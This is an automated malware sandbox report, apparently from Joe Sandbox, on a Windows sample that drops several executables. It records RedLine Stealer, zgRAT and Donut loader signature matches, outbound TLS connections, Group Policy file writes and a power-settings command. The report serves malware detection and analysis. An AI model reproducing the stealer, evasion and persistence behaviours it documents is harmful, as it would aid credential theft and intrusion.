Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49938 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49902
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49900
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789

Source: unknown	HTTPS traffic detected: 172.67.75.163:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.111:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.144.181:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.180.119:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.162.121:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.55.189:443 -> 192.168.2.4:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.82.182:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.130.41.108:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 37.221.125.202:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 93.186.225.194:443 -> 192.168.2.4:49782 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 93.186.225.194:443 -> 192.168.2.4:49783 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 95.142.206.0:443 -> 192.168.2.4:49785 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 95.142.206.2:443 -> 192.168.2.4:49790 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 95.142.206.1:443 -> 192.168.2.4:49796 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.147.32:443 -> 192.168.2.4:49802 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.132.113:443 -> 192.168.2.4:49803 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.147.32:443 -> 192.168.2.4:49804 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.147.32:443 -> 192.168.2.4:49805 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.104.85.160:443 -> 192.168.2.4:49807 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49813 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.4.15:443 -> 192.168.2.4:49815 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49834 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49838 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.4.15:443 -> 192.168.2.4:49839 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.4.15:443 -> 192.168.2.4:49840 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49900 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.4.15:443 -> 192.168.2.4:49902 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49935 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.4.15:443 -> 192.168.2.4:49936 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49937 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.4.15:443 -> 192.168.2.4:49938 version: TLS 1.2

Drops certificate files (DER)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Temp\Tmp704E.tmp			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Temp\Tmp703D.tmp			Jump to dropped file

System Summary

Malicious sample detected (through community Yara rule)

Source: 23.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 21.2.9RJ0JeM9uj2rfsuq_woBmmIY.exe.e2b000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 21.2.9RJ0JeM9uj2rfsuq_woBmmIY.exe.e2b000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 23.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 8.2.pRIMqfuwRZ49ldgjUZ_z2py6.exe.46a3010.2.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 8.2.pRIMqfuwRZ49ldgjUZ_z2py6.exe.46a3010.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 21.2.9RJ0JeM9uj2rfsuq_woBmmIY.exe.e00000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 00000017.00000002.3121845008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 00000009.00000002.2945966456.000001C57C0F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0000000F.00000002.3133986661.0000000003548000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000B.00000002.3128484009.0000000002D47000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000E.00000002.3133832345.000000000352A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown

PE file contains section with special chars

Source: WlCIinu0yp.exe	Static PE information: section name:
Source: WlCIinu0yp.exe	Static PE information: section name:

PE file has nameless sections

Source: fiona[1].exe.0.dr	Static PE information: section name:
Source: fiona[1].exe.0.dr	Static PE information: section name:
Source: fiona[1].exe.0.dr	Static PE information: section name:
Source: fiona[1].exe.0.dr	Static PE information: section name:
Source: fiona[1].exe.0.dr	Static PE information: section name:
Source: fiona[1].exe.0.dr	Static PE information: section name:
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe.0.dr	Static PE information: section name:
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe.0.dr	Static PE information: section name:
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe.0.dr	Static PE information: section name:
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe.0.dr	Static PE information: section name:
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe.0.dr	Static PE information: section name:
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe.0.dr	Static PE information: section name:

Uses powercfg.exe to modify the power settings

Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe

Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

Creates files inside the system directory

Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Windows\System32\GroupPolicy\gpt.ini	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Windows\System32\GroupPolicy\Machine	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Windows\System32\GroupPolicy\User	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Windows\System32\GroupPolicy\Machine\Registry.pol	Jump to behavior

Detected potential crypto function

Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_004E925D	7_2_004E925D
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_00496450	7_2_00496450
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_0040C490	7_2_0040C490
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_0045A490	7_2_0045A490
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_004564A0	7_2_004564A0
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_0045B4B0	7_2_0045B4B0
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_00458520	7_2_00458520
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_0043B750	7_2_0043B750
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_00438770	7_2_00438770
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_0043C800	7_2_0043C800
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_004378A0	7_2_004378A0
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_00442940	7_2_00442940
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_00439A80	7_2_00439A80
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_00434B20	7_2_00434B20
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_0042EB90	7_2_0042EB90
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_0045CC40	7_2_0045CC40
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_0040BFC0	7_2_0040BFC0
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_0048E040	7_2_0048E040
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_0044C160	7_2_0044C160
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_00490100	7_2_00490100
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_00487270	7_2_00487270
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_0047F360	7_2_0047F360
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_004E03D0	7_2_004E03D0
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_00483470	7_2_00483470
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_00402410	7_2_00402410
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_004944E0	7_2_004944E0
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_00416490	7_2_00416490
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_004E959F	7_2_004E959F
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_00402600	7_2_00402600
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_00472630	7_2_00472630
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_00433740	7_2_00433740
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_00470760	7_2_00470760
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_0040E7B0	7_2_0040E7B0
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_0048F7B0	7_2_0048F7B0
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_004FB84F	7_2_004FB84F
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_00471830	7_2_00471830
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_004FD9FE	7_2_004FD9FE
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_0041F9B0	7_2_0041F9B0
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_00481A30	7_2_00481A30
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_004E3B58	7_2_004E3B58
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_0044EB90	7_2_0044EB90
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_004E5B90	7_2_004E5B90
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_004F6CC5	7_2_004F6CC5
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_00490E40	7_2_00490E40
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_0049EE70	7_2_0049EE70
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_00418EE0	7_2_00418EE0
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_00483EF0	7_2_00483EF0
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_00482FE0	7_2_00482FE0
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_00493FF0	7_2_00493FF0

Dropped file seen in connection with other malware

Source: Joe Sandbox View	Dropped File: C:\ProgramData\DDEReadline 2.22.66\DDEReadline 2.22.66.exe 4C5C6DEBE9453F0343F163AA72B7049F3167BC08D3B2D549FCABC4EE6BFBAFCD
Source: Joe Sandbox View	Dropped File: C:\ProgramData\MSIUpdaterV202_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV202.exe 491D7B93C49438AC2B97E8AD343B99ABBCC3536D9D32DE6972FF64A7EC32F858
Source: Joe Sandbox View	Dropped File: C:\ProgramData\WinTrackerSP\WinTrackerSP.exe 0823C2F58D094E1C096AE9184ACF0B930DF6DFF97D0CD77728DC3FF07F9C0096

Found potential string decryption / allocating functions

Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: String function: 0046A190 appears 47 times
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: String function: 00469F00 appears 32 times

PE file contains executable resources (Code or Archives)

Source: 060[1].exe.0.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: FCK5Px_iTbBaGQTFBpzZeks2.exe.0.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS

PE file does not import any functions

Source: ydYqwUL3GNS6IHkMgIteny78.exe.0.dr

Static PE information: No import functions for PE file found

Yara signature match

Source: 23.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 21.2.9RJ0JeM9uj2rfsuq_woBmmIY.exe.e2b000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 21.2.9RJ0JeM9uj2rfsuq_woBmmIY.exe.e2b000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 23.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 8.2.pRIMqfuwRZ49ldgjUZ_z2py6.exe.46a3010.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 8.2.pRIMqfuwRZ49ldgjUZ_z2py6.exe.46a3010.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 21.2.9RJ0JeM9uj2rfsuq_woBmmIY.exe.e00000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 00000017.00000002.3121845008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 00000009.00000002.2945966456.000001C57C0F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0000000F.00000002.3133986661.0000000003548000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000B.00000002.3128484009.0000000002D47000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000E.00000002.3133832345.000000000352A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12

Source: fiona[1].exe.0.dr	Static PE information: Section: ZLIB complexity 1.0003185711998293
Source: fiona[1].exe.0.dr	Static PE information: Section: ZLIB complexity 0.9937318313953488
Source: fiona[1].exe.0.dr	Static PE information: Section: ZLIB complexity 0.9921875
Source: fiona[1].exe.0.dr	Static PE information: Section: ZLIB complexity 1.0006510416666667
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe.0.dr	Static PE information: Section: ZLIB complexity 1.0003185711998293
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9937318313953488
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9921875
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe.0.dr	Static PE information: Section: ZLIB complexity 1.0006510416666667
Source: wDFs1SzoVQiT2__nQmbIm6Rg.exe.0.dr	Static PE information: Section: .Right ZLIB complexity 0.9981044138707038
Source: 9RJ0JeM9uj2rfsuq_woBmmIY.exe.0.dr	Static PE information: Section: .Shine ZLIB complexity 0.997067775974026

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@96/168@35/26

Source: C:\Users\user\Desktop\WlCIinu0yp.exe

File created: C:\Users\user\Documents\SimpleAdobe

Jump to behavior

Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe	Mutant created: \Sessions\1\BaseNamedObjects\IntelPowerExpert
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6040:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2504:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7268:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4504:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7672:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5328:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2212:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6084:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7456:120:WilError_03
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Mutant created: \Sessions\1\BaseNamedObjects\JarakHalgWW_12
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\Protect544cd51a.dll
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8160:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7632:120:WilError_03

Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe

File created: C:\Users\user\AppData\Local\Temp\adobeLgVUNbWj4Aw0

Jump to behavior

Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\WlCIinu0yp.exe

File read: C:\Windows\System32\GroupPolicy\gpt.ini

Jump to behavior

Source: C:\Users\user\Desktop\WlCIinu0yp.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization

Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000002.2547218346.0000000000515000.00000002.00000001.01000000.00000006.sdmp, ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3123029988.0000000000901000.00000040.00000001.01000000.0000000C.sdmp, H14SDf_AWcPvvQK5Xx97sISX.exe, 00000010.00000002.3125680466.0000000000516000.00000002.00000001.01000000.00000011.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000002.2538050137.0000000000515000.00000002.00000001.01000000.00000014.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: RegAsm.exe, 00000017.00000002.3208144396.000000001BD38000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3156266876.0000000015DC6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: RegAsm.exe, 00000017.00000002.3208144396.000000001BD38000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3156266876.0000000015DC6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: RegAsm.exe, 00000017.00000002.3208144396.000000001BD38000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3156266876.0000000015DC6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000002.2547218346.0000000000515000.00000002.00000001.01000000.00000006.sdmp, ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3123029988.0000000000901000.00000040.00000001.01000000.0000000C.sdmp, H14SDf_AWcPvvQK5Xx97sISX.exe, 00000010.00000002.3125680466.0000000000516000.00000002.00000001.01000000.00000011.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000002.2538050137.0000000000515000.00000002.00000001.01000000.00000014.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = sqlite_rename_table(sql, %Q), tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: RegAsm.exe, 00000017.00000002.3208144396.000000001BD38000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3156266876.0000000015DC6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: RegAsm.exe, 00000017.00000002.3208144396.000000001BD38000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3156266876.0000000015DC6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: RegAsm.exe, 00000017.00000002.3208144396.000000001BD38000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3156266876.0000000015DC6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
